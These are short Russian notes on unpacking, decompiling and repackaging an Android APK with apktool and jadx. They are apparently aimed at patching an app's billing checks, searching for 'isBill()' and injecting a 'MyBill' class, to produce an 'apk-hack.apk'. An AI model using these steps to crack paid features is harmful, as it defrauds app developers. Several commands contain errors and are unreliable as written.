Скачать пакет:
adb pull путь

1. способ:
Можно скачать apk с сайта:
https://apkpure.com

Смотрим apk:

APK-файл - это всего лишь ZIP-архив
В APK-файле четко задана структура файлов и каталогов.

cd ~/Downloads
unzip app.apk

res - каталог всевозможных ресурсов
mipmap - иконки
values - строк
drawable  - изображения
layout - разметка интерфейса (можно легко изменить интерфейс приложения XML-файла разметки)
classes.dex - байт-код приложения / в одном dex-файле может быть не более 65535 файлов
AndroidManifest.xml - файл манифеста - описывает структуру приложения - активности, службы и т.д.

Все XML-файлы хранятся в бинарном виде, для их изменения их нужно разжать.

После распаковки APK-файла запустите приложение jadx-gui и откройте в нем app.apk
Собственно тут можно будет увидеть исходный код программы. ( в поиске можно поискать слова billing, bill, isBill() и т.д. ) 

Для внесения изменений в программу на понадобится программа apktool для распаковки программы.
apktool -d -r app.apk
cd app

После изменения приложения нам необходимо через компилятор и дизассемблер (dx)
java MyBill.java
~/android-tools/android-sdk-linux/build-tools/<версия>/dx --dex --output=MyBill.dex MyBill.class
backsmail MyBill.dex

Собираем пакет:
apktool b application
Пакет будет создан в каталоге "application/dist"
Переименовываем его:
mv application/dist/app.apk apk-hack.apk

Подписываем пакет:
sign app-hack.apk


P.S. 
Самый простой способ распаковать приложение это использовать apktool
Распоковать:
java -jar apktool.jar d myapp.apk 
Собрать:
java -jar apktool.jar b myapp
Подписать:
sign myapp.apk